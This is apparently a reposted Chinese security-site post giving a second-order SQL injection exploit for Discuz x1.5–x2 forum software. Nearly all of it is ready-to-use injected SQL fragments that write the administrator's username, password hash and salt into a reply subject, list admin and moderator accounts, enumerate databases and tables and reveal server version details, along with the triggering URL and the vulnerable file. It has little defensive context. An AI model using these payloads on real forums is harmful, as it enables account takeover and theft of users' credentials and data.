
Discuz x1.5 – x2版本 二次注射
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 |
a´,`subject`=(/*!select*/ concat(username,´¦´,password,´¦´,salt) from pre_ucenter_members where uid=1 limit 0,1),comment= 再给出一些语句。 ´,`subject`=(/*!select*/ group_concat(uid,´:´) from pre_common_member where groupid=1),comment=´//查看管理用户 ´,`subject`=(/*!select*/ group_concat(uid,´:´) from pre_common_member where groupid=2),comment=´//超级版主 ´,`subject`=(/*!select*/ group_concat(uid,´:´) from pre_common_member where groupid=3),comment=´//超级版主 ´,`subject`=(/*!select*/ table_name from information_schema.tables where table_schema=0x0000 limit 0,1),comment=´//跑表 ´,`subject`=(/*!select*/ group_concat(schema_name) from information_schema.schemata),comment=´//获取所有库 ´,`subject`=(/*!select*/ concat(@@version,´:´,user(),´:´,database())),comment=´//版本信息 然后到回复补充那里随便补充一下,注入语句就被执行。 补充的地址: forum.php?mod=misc&tid={tid}&action=postappend&pid={pid} 上面的语句就会把取得的内容写进回复主题返回。 漏洞文件: sourcemoduleforumforum_misc.php |
本文摘自网络由网络安全攻防研究室(www.91ri.org) 信息安全小组收集整理.转载本文请著名原文地址及原作者版权信息。